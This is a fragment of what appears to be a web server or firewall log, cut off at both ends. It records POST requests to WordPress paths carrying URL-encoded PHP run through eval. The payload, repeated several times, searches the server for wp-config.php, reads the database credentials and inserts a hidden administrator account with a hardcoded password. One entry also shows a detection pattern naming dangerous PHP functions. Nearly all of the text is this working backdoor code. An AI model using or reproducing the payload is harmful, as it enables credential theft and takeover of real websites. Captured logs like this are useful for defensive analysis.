LECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B\"));","POST \/wp-includes\/html-api\/class-wp-html-token.php HTTP\/1.1\nsec-ch-ua-platform:\"Windows\"\ncontent-type:application\/x-www-form-urlencoded\ncontent-length:12663\naccept-charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\nsec-fetch-site:none\naccept-encoding:gzip,deflate\nhost:dewenlabels.com\naccept-language:eo;q=0.8,en-US;q=0.6,en;q=0.4\nsec-fetch-user:?1\naccept:*\/*\nsec-fetch-dest:document\nupgrade-insecure-requests:1\nsec-ch-ua:\" Not A;Brand\";v=\"99\", \"Chromium\";v=\"101\", \"Microsoft Edge\";v=\"101\"\nsec-fetch-mode:navigate\nsec-ch-ua-mobile:?0\nuser-agent:Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/101.0.4951.64 Safari\/537.36 Edg\/101.0.1210.47\n\netswnK=eval(rawurldecode(\"%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B\"));"]
["2026-05-16 06:05:21","213.209.159.254","POST","\/wp-includes\/Text\/hvsmdki\/1qjzitp\/hbmzirl\/function.debug.php","Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/116.0.0.0 Safari\/537.36","post","(?:define|eval|file_get_contents|include|require|require_once|shell_exec|phpinfo|system|passthru|chr|char|preg_\\w+|execute|echo|print|print_r|var_dump|(fp)open|alert|showmodaldialog)\\( >> md:%3C%3Fphp%20%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2